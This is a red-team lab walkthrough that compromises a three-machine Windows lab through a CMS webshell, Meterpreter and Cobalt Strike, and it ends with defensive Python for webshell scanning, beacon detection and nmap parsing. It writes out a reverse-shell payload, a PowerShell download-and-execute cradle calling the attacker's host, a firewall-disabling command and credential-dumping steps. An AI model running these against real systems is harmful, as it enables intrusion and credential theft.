ATT&CK Hands-on Series: Red Team Lab (1) [Full Record]


Published 20 July 2023 (author not stated)

Environment setup

There are three machines: win7 is the externally facing web server, win2003 and win2008 are internal hosts.

3: Network topology

Building the environment

1: Connect all three machines to the VMnet1 adapter
2: Disable VMware's DHCP service on the VMnet1 adapter
3: Add a second network adapter to win7 (win2003 and win2008 keep a single adapter) and set it to NAT
4: kali uses NAT
5: Take a snapshot of each of the machines above
6: Power on all three target machines

Configuring the targets

The configuration steps below are recommended; skipping them makes the lab very annoying. The default password on all three targets is hongrisec@2019

Configuring win2008

1: Reset the password. When you log in to win2008 you are told the password has expired and must be reset; just set a new one. Note that the account whose password you are changing is liukaifeng01.
2: Don't be trigger-happy. After boot you will see a prompt asking you to restart the computer. Don't agree; choose "restart later" and then ignore it.
3: It is recommended to set the administrator account's password to never expire.

Configuring win7

1: About removing devices. Some people habitually remove devices such as "Printer", "Sound card" and "CD/DVD (IDE)". Don't do that on win7, and above all don't remove the "Printer", otherwise phpstudy fails to start.
2: Don't be trigger-happy. After boot you will see a prompt asking you to restart the computer. Don't agree; choose "restart later" and then ignore it.
3: Start phpstudy, in the directory: C:
4: Check the IP. Your IP may be fine, but my machine hit an error: with one adapter on VMnet1 and one on NAT it could not obtain a NAT address, while the other machines obtained NAT addresses normally (a workaround can be found here). The fix I used is below: with three adapters, NAT worked normally, while the bridged adapter got 192.254.124.253, which is unusable, and that happens to suit the lab environment:
5: Confirm the web service is up. Browsing to win7's external IP shows the phpStudy probe page, which means it is working. If the network is configured correctly but the site still cannot be reached, try adding a firewall rule and then restart phpStudy.

Information gathering

nmap information gathering

The target has ports 80 and 3306 open, so look at the website first.

Opening the website, the first thing you see is the following page. It has the following problems:
- HTTP in clear text
- Server fingerprint disclosure (OS, Apache and PHP versions)
- phpinfo information disclosure
- Weak MySQL password
- MySQL exposed to password brute force
- phpStudy backdoor (to be checked)

Directory brute force

Run a pass with 御剑.

Probing the site

Visit the directories 御剑 turned up, one by one:

Probing phpMyAdmin

Logging in to phpMyAdmin with the weak password root succeeds, and a database named newyxcms is visible (cms: content management system). Problem: phpMyAdmin is reachable from the outside (by default it only allows access from localhost).

That basically confirms the site runs yxcms. Try to reach it: the "公告信息" (announcements) page reveals that the back-end credentials are admin:123456 and the back-end URL is /?r=admin.

Probing

The site version is identified as 1.2.1. One could look for vulnerabilities in this version, but the back-end credentials were already found in the announcements, so there is no need to bother.

Site back end

Under "前台模板" (front-end templates) you can edit the templates. Templates are usually custom PHP files, and if you can write arbitrary PHP you can drop a one-line webshell directly.

Exploitation

getshell

1: Write the one-line webshell
2: Find the path where it lives: protected/apps/default/view
3: Connect with 蚁剑: 192.168.40.128/yxcms/protected/apps/default/view/default/

Encoding: with the default UTF-8 some content shows up garbled, so use GBK here.

Collecting system information

Turn off the firewall:
netsh advfirewall set allprofiles state off

Upload the payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.3.139.50 lport=4444 -f exe -o

Reverse shell back to msf

1: msf listener
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost 10.3.139.50
run
2: Launch the payload

win7 information gathering

The meterpreter session we received comes from win7.

1: Gather patch information
run post/windows/gather/enum_patches
2: Installed software. nmap is present, so it can be used directly to scan the internal 52 subnet
run post/windows/gather/enum_applications

Add a route

Add the route:
run autoroute -s 192.168.52.0 255.255.255.0
List the routes:
run autoroute -p

Internal network penetration

Internal host discovery

An ARP scan finds three hosts on the internal network:
run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

Start a proxy in msf (from the meterpreter > prompt):
background            (send the session to the background)
use auxiliary/server/socks5
show options
run

Edit proxychains
sudo vim /etc/ap

Internal host discovery

nmap scanning over the proxy fell flat. (Only TCP connect scans can be carried through a SOCKS proxy; ICMP pings and SYN scans cannot, so anything other than nmap -sT -Pn will come back empty.) No worries: remember that the msf enumeration found nmap on win7? Use 蚁剑 to run the scan from there. Since nmap alone still cannot do a full host discovery, use the hosts found by msf as the scan targets.

Using Cobalt Strike

The steps above went badly, so switch to Cobalt Strike. Using cs requires already having a shell; that is, once 蚁剑 has a shell you can use cs.

cs server, started on kali
sudo chmod +x teamserver
sudo ./teamserver 10.3.139.50 123456 &

cs client, started on kali
sudo chmod +x ./

Even after rebooting kali the cs login is still refused; today is really hard ::>_<::

Troubleshooting addendum: when starting the cs server, don't run it in the background and it works (although on another kali box I run cs in the background without any problem).

For various reasons the first attempt did not go smoothly, so this is the second run. The four IPs below do not need memorising; they only explain why the IPs differ between some screenshots. The point is to understand the logic of the operations.
kali IP (originally) 192.168.40.147 -----> (now) 10.3.139.50
win7 IP (originally) 192.168.40.128 -----> (now) 10.3.139.51

Set up a listener

Because win7 is a web server, HTTP is used to establish the connection. This means cs cannot contact the compromised host on its own; the host has to connect to cs to pick up commands. By default the host checks in with the cs server every 60 seconds to download tasks, executes them locally, and then sends the output back to the server in an HTTP POST. (Treat the IP below as 10.3.139.50.)

Generate a Web Delivery

Generate the payload, as a file or as a command. It then produces a PowerShell command such as:
# powershell is a built-in Windows component
# no file needs to be written to the target server's disk
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.147:80/a'))"

Taking the host

Run the command in 蚁剑's virtual terminal and the host checks in to cs. As you can see, the host only connects to the server every 60 seconds, which is too slow for a lab, so adjust the sleep time; the change takes effect at the next check-in, so you wait up to 60 seconds.

[The content under the third-level headings below is notes for myself; readers can skip it]

Enter the command line

Every GUI action is echoed in the command line, and commands can also be typed there directly.

Current user privileges

File management: beacon | right click | Explore | File Browser

Process management: beacon | right click | Explore | Process List

Screenshots: take one with beacon | right click | Explore | Screenshots; view them under View | Screenshots

Desktop control: beacon> desktop

Keylogging: beacon | right click | Explore | Process List | Log Keystrokes; view the log under View | Keystrokes. If you keylog, it is better to migrate the injected process first, and not into a SYSTEM process: SYSTEM is the machine account, it never logs on interactively, so there is no user keyboard input to capture from its session.

Internal network information gathering

Port scan: beacon | right click | Explore | Port Scan
What is this scanning? It only found myself. While checking the network I found that win7 had lost connectivity to the other machines; after fixing that, scan again. That's it? Let's use nmap instead! nmap under cs works as expected.

Vulnerability scan

The scan is a bit slow; be patient, it brings a rich harvest. (Since using msf against win7 earlier did not work well, this is scan-only, with no handoff to msf.)

Scanning 192.168.52.141:
beacon> shell nmap --script=vuln 192.168.52.141
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.141
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( ) at 2020-08-22 17:57 China Standard Time
[+] received output:
Nmap scan report for 192.168.52.141
Host is up (0.00s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:

135/tcp  open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
777/tcp  open  multiling-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open  NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1028/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1029/tcp open  ms-lsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1030/tcp open  iad1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6002/tcp open  X11:2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7001/tcp open  afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7002/tcp open  afs3-prserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8099/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:70:62:5D (VMware)

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       /en-us/library/security/
|_      /cgi-bin/?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       /en-us/library/security/
|       /cgi-bin/?name=CVE-2017-0143
|_      /msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 125.97 seconds

Scanning 192.168.52.138:
beacon> shell nmap --script=vuln 192.168.52.138
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.138
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( ) at 2020-08-22 18:02 China Standard Time
[+] received output:
Nmap scan report for 192.168.52.138
Host is up (0.00s latency).
Not shown: 982 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp    open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp    open  kerberos-sec
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
135/tcp   open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
389/tcp   open  ldap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:

445/tcp   open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
464/tcp   open  kpasswd5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
593/tcp   open  http-rpc-epmap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
636/tcp   open  ldapssl
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
3268/tcp  open  globalcatLDAP
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3269/tcp  open  globalcatLDAPssl
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
49154/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49161/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49167/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:AA:F7:D1 (VMware)

Host script results:
| smb-double-pulsar-backdoor:
|   VULNERABLE:
|   Double Pulsar SMB Backdoor
|     State: VULNERABLE
|     Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
|       The Double Pulsar SMB backdoor was detected running on the remote machine.
|
|     Disclosure date: 2017-04-14
|     References:
|       /forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
|       /countercept/doublepulsar-detection-script
|_      /shadowbrokers/@theshadowbrokers/lost-in-translation
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       /en-us/library/security/
|       /cgi-bin/?name=CVE-2017-0143
|_      /msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 153.58 seconds

The service mix on 192.168.52.138 (DNS on 53, Kerberos on 88, LDAP on 389/636, kpasswd on 464, global catalog on 3268/3269) identifies it as the domain controller.

Scanning 192.168.52.143:
beacon> shell nmap --script=vuln 192.168.52.143
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.143
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( ) at 2020-08-22 18:08 China Standard Time
[+] received output:
Nmap scan report for (192.168.52.143)
Host is up (0.00s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE
80/tcp   open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:

|   Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=
|   Found the following possible CSRF vulnerabilities:
|
|     Path: :80/
|     Form id:
|     Form action: /#bottom
|
|     Path: :80/
|     Form id:
|_    Form action: /#bottom
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /phpMyAdmin/: phpMyAdmin
|_  /PHPMyAdmin/: phpMyAdmin
| http-phpself-xss:
|   VULNERABLE:
|   Unsafe use of $_SERVER["PHP_SELF"] in PHP files
|     State: VULNERABLE (Exploitable)
|       PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|
|     Extra information:
|
|   Vulnerable files with proof of concept:
|     //%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
|   Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=
|     References:
|       //Cross-site_Scripting_(XSS)
|_      /manual/en/
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       /cgi-bin/?name=CVE-2007-6750
|_      /slowloris/
| http-sql-injection:
|   Possible sqli for queries:
|     :80/?act=Function%27%20OR%20sqlspider
|     :80/?act=phpinfo%27%20OR%20sqlspider
|     :80/?act=Function%27%20OR%20sqlspider
|     :80/?act=phpinfo%27%20OR%20sqlspider
|     :80/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
|     :80/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|     :80/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|   Possible sqli for forms:
|     Form at path: /, form's action: /#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|       funName
|     Form at path: /, form's action: /#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|_      funName
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
135/tcp  open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open  NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1026/tcp open  LSA-or-nterm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1027/tcp open  IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1028/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1029/tcp open  ms-lsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1248/tcp open  hermes
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3306/tcp open  mysql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-double-pulsar-backdoor:

|   VULNERABLE:
|   Double Pulsar SMB Backdoor
|     State: VULNERABLE
|     Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
|       The Double Pulsar SMB backdoor was detected running on the remote machine.
|
|     Disclosure date: 2017-04-14
|     References:
|       /forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
|       /shadowbrokers/@theshadowbrokers/lost-in-translation
|_      /countercept/doublepulsar-detection-script
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       /en-us/library/security/
|       /msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      /cgi-bin/?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 138.36 seconds

Two things to keep in mind when reading these results. The http-* "possible" findings (CSRF and SQL injection on the forms of the phpStudy probe page, the PHP_SELF XSS) come from nmap's spider heuristics and need manual confirmation, whereas smb-vuln-ms08-067 and smb-vuln-ms17-010 are direct protocol checks and are reliable. And smb-double-pulsar-backdoor does not report a vulnerability: it reports that the DoublePulsar SMB implant is already answering on 445, which means the host has already been exploited, not merely that it could be.

Domain information gathering

What is this? Garbage.

Collecting accounts and passwords

Dump the logon passwords straight from memory:
beacon> logonpasswords

Use LaZagne to find every locally stored password. Upload the exe to the target with 蚁剑 and run it there. Possibly again because of this machine, the all module did not work, but the other modules ran fine.
C:\phpStudy> all
C:\phpStudy> browsers
|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|
[+] System masterkey decrypted for f22e410f-f947-4e08-8f2a-8f65df603f8d
[+] System masterkey decrypted for 1e582198-061f-43f1-abdf-d4e9b606b035
[+] System masterkey decrypted for bac7c6bc-5481-420b-b563-762266ca9865
########## User: Administrator ##########
------------------- Firefox passwords -----------------
[+] Password found
URL: 192.168.101.12:8080
Login: info@
Password: 123456789
########## User: liukaifeng01 ##########
------------------- Firefox passwords -----------------
[+] Password found
URL: 192.168.101.12:8080
Login: info@
Password: 123456789
[+] 2 passwords have been found.
For more information launch it again with the -v option
elapsed time = 8.

Log on to other hosts with the domain account

Set up a tunnel

The other hosts sit only on VMnet1, with no route to the team server, so the connection is made over SMB: an SMB beacon, linked through the win7 beacon over a named pipe.
target

The system password was already obtained above, so log on directly with the domain administrator's password.

Take hosts 138 and 141 on the internal network the same way.

Results topology diagram

Alright, that's the end.
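The getshell step above relies on a template editor that accepts arbitrary PHP. The check a defender runs for that is a scan of the web-writable template directory for execution primitives fed from request data. The code below is an added example, not code from the original post or from yxcms: only the directory protected/apps/default/view comes from the walkthrough; every file name and file body in SAMPLE_TEMPLATES is constructed for this example, including the one-liner itself.

```python
"""Scan CMS template files for one-line PHP webshells (added example, not from the post)."""
import re

# Execution primitives a one-liner needs.
EXEC_PRIMITIVE = re.compile(
    r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)\s*\(")
# Attacker-controlled input arriving through PHP superglobals.
REQUEST_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[")
# Variable-function call fed straight from request data, e.g. $f($_REQUEST['a']).
DYNAMIC_CALL = re.compile(r"\$\w+\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[")
# Decoders commonly wrapped around an encoded payload.
DECODER = re.compile(r"\b(?:base64_decode|str_rot13|gzinflate|gzuncompress|hex2bin)\s*\(")


def scan_template(content):
    """Return a list of {"line": n, "reason": text} findings for one file's content."""
    findings = []
    for n, line in enumerate(content.splitlines(), start=1):
        has_exec = EXEC_PRIMITIVE.search(line) is not None
        if has_exec and REQUEST_INPUT.search(line):
            findings.append({"line": n, "reason": "execution primitive fed from request data"})
        if DYNAMIC_CALL.search(line):
            findings.append({"line": n, "reason": "variable function called with request data"})
        if has_exec and DECODER.search(line):
            findings.append({"line": n, "reason": "execution primitive over a decoded payload"})
    return findings


def scan_templates(files):
    """files: {path: content}. Returns only the paths that produced findings."""
    report = {}
    for path, content in files.items():
        hits = scan_template(content)
        if hits:
            report[path] = hits
    return report


# Constructed sample templates (file names and bodies are not real yxcms files).
VIEW_DIR = "protected/apps/default/view/default/"
SAMPLE_TEMPLATES = {
    # Legitimate templates: output is escaped, nothing from the request is executed.
    VIEW_DIR + "index.php":
        "<?php echo htmlspecialchars($data['title']); ?>\n"
        "<ul><?php foreach ($list as $row): ?><li><?= htmlspecialchars($row) ?></li><?php endforeach; ?></ul>\n",
    VIEW_DIR + "search.php":
        "<?php $q = htmlspecialchars($_GET['q']); echo $q; ?>\n",
    # The classic one-liner (constructed): POST parameter "cmd" goes straight into eval.
    VIEW_DIR + "shell.php":
        "<?php @eval($_POST['cmd']); ?>\n",
    # Same effect as a variable function call, which hides the primitive's name.
    VIEW_DIR + "foot.php":
        "<?php $f = $_REQUEST['f']; $f($_REQUEST['a']); ?>\n",
    # Encoded payload: two indicators on one line.
    VIEW_DIR + "x.php":
        "<?php eval(base64_decode($_GET['z'])); ?>\n",
}

if __name__ == "__main__":
    for path, hits in scan_templates(SAMPLE_TEMPLATES).items():
        for h in hits:
            print(f"{path}:{h['line']}: {h['reason']}")
```

Pattern matching like this catches the common one-liners and their thin disguises, not a determined obfuscator; the structural fix is to keep the view directory unwritable by the web server account and to stop the admin panel from saving files containing PHP at all.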
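The listener section above describes the beacon's behaviour: it polls the team server over HTTP every 60 seconds by default and POSTs results back. That fixed interval is what a defender looks for in proxy logs. The detector below is an added example, not code from the original post or from Cobalt Strike: it groups requests by client, host and path and flags series whose inter-request gaps barely vary. The log format and every line of SAMPLE_PROXY_LOG are constructed for this example (the IPs reuse the walkthrough's kali and win7 addresses; the paths and the intranet.example host are made up).

```python
"""Flag periodic HTTP check-ins ("beaconing") in web-proxy logs (added example, not from the post)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Assumed log format (constructed): "<ISO-8601 time> <client> <method> <url> <status>"
LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")

# Constructed sample: one 60-second beacon to 10.3.139.50, one result POST, and ordinary
# browsing to an intranet site at irregular times.
SAMPLE_PROXY_LOG = """\
2020-08-22T18:00:00 10.3.139.51 GET http://10.3.139.50/ca 200
2020-08-22T18:00:07 10.3.139.51 GET http://intranet.example/news 200
2020-08-22T18:01:00 10.3.139.51 GET http://10.3.139.50/ca 200
2020-08-22T18:02:00 10.3.139.51 GET http://10.3.139.50/ca 200
2020-08-22T18:02:41 10.3.139.51 GET http://intranet.example/news 200
2020-08-22T18:03:00 10.3.139.51 GET http://10.3.139.50/ca 200
2020-08-22T18:03:00 10.3.139.51 POST http://10.3.139.50/submit.php?id=123 200
2020-08-22T18:04:00 10.3.139.51 GET http://10.3.139.50/ca 200
2020-08-22T18:05:00 10.3.139.51 GET http://10.3.139.50/ca 200
2020-08-22T18:09:12 10.3.139.51 GET http://intranet.example/news 200
2020-08-22T18:10:30 10.3.139.51 GET http://intranet.example/news 200
2020-08-22T18:30:05 10.3.139.51 GET http://intranet.example/news 200
"""


def parse_line(line):
    """Return (timestamp, client, host, path) or None for lines that don't match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, _method, url, _status = m.groups()
    u = urlsplit(url)
    return datetime.fromisoformat(ts), client, u.netloc, u.path


def find_beacons(log_text, min_hits=5, max_cv=0.1):
    """Group requests by (client, host, path) and flag the series whose gaps between
    requests are nearly constant: coefficient of variation (stdev / mean) <= max_cv.
    Series shorter than min_hits are ignored to avoid flagging a handful of requests."""
    series = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            ts, client, host, path = rec
            series[(client, host, path)].append(ts)

    findings = []
    for (client, host, path), stamps in series.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            findings.append({
                "client": client, "host": host, "path": path,
                "hits": len(stamps), "interval_s": round(mean, 1), "cv": round(cv, 3),
            })
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_PROXY_LOG):
        print(f"{f['client']} -> {f['host']}{f['path']}: "
              f"{f['hits']} hits every ~{f['interval_s']}s (cv={f['cv']})")
```

A beacon configured with jitter spreads its gaps out, so max_cv has to be raised for it; the hit count over a long window and the fact that the gaps never exceed the configured sleep still separate it from the intranet browsing in the sample, which is flagged by neither setting.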
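The three nmap --script=vuln runs above are useful precisely because the VULNERABLE lines are easy to miss among the clamav-exec errors and spider noise. The parser below is an added example, not code from the original post or from nmap: it reads nmap's normal text output and returns, per host, the open ports and only those script results whose State contains VULNERABLE (so "LIKELY VULNERABLE" counts, while one-line results such as "false" or an NT_STATUS error do not), with any CVE ids found in the block. SAMPLE_NMAP_OUTPUT is a constructed, shortened rendition in the same layout as the walkthrough's output, using the script names, CVE ids and MAC address that appear there and omitting the reference URLs.

```python
"""Parse `nmap --script=vuln` text output into open ports and VULNERABLE findings (added example)."""
import re

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ )?\(?(\d{1,3}(?:\.\d{1,3}){3})\)?")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# A script result starts at "| name:" or "|_name:"; its continuation lines are indented further.
SCRIPT_RE = re.compile(r"^\|_? ?([A-Za-z0-9_-]+):")
STATE_RE = re.compile(r"^\|_?\s+State:\s+(.+?)\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

# Constructed sample in nmap's layout (shortened; not a real capture).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.52.141
Host is up (0.00s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
MAC Address: 00:0C:29:70:62:5D (VMware)

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_    Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    Disclosure date: 2017-03-14

Nmap scan report for (192.168.52.143)
Host is up (0.00s latency).
PORT     STATE SERVICE
80/tcp   open  http
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|_    IDs:  CVE:CVE-2007-6750
3306/tcp open  mysql

Host script results:
| smb-double-pulsar-backdoor:
|   VULNERABLE:
|   Double Pulsar SMB Backdoor
|     State: VULNERABLE
|_    Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)

Nmap done: 2 IP addresses (2 hosts up) scanned in 125.97 seconds
"""


def parse_vuln_scan(text):
    """Return {ip: {"ports": [(port, service), ...], "vulns": [finding, ...]}}.
    A finding has keys script, port ("80/tcp" for port scripts, None for host scripts),
    state and cves; it is kept only when State contains VULNERABLE and is not NOT VULNERABLE."""
    hosts = {}
    host = None   # ip of the report block being read
    port = None   # current port while inside a port's script results, None for host scripts
    cur = None    # script result being accumulated

    def finish():
        nonlocal cur
        if cur is not None and host is not None:
            state = (cur["state"] or "").upper()
            if "VULNERABLE" in state and not state.startswith("NOT"):
                hosts[host]["vulns"].append({
                    "script": cur["script"], "port": cur["port"],
                    "state": cur["state"], "cves": sorted(cur["cves"]),
                })
        cur = None

    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            finish()
            host, port = m.group(1), None
            hosts[host] = {"ports": [], "vulns": []}
            continue
        if host is None:
            continue
        m = PORT_RE.match(line)
        if m:
            finish()
            port = f"{m.group(1)}/{m.group(2)}"
            if m.group(3) == "open":
                hosts[host]["ports"].append((port, m.group(4)))
            continue
        if line.startswith("Host script results"):
            finish()
            port = None
            continue
        m = SCRIPT_RE.match(line)
        if m:
            finish()
            cur = {"script": m.group(1), "port": port, "state": None, "cves": set()}
            if line.startswith("|_"):   # one-line result, nothing more to read
                finish()
            continue
        if cur is not None and line.startswith("|"):
            m = STATE_RE.match(line)
            if m:
                cur["state"] = m.group(1)
            cur["cves"].update(CVE_RE.findall(line))
            if line.startswith("|_"):   # last line of this script's block
                finish()
            continue
        if not line.strip():
            finish()
    finish()
    return hosts


if __name__ == "__main__":
    for ip, info in parse_vuln_scan(SAMPLE_NMAP_OUTPUT).items():
        for v in info["vulns"]:
            print(f"{ip} {v['port'] or 'host'}: {v['script']} {v['state']} {' '.join(v['cves'])}")
```

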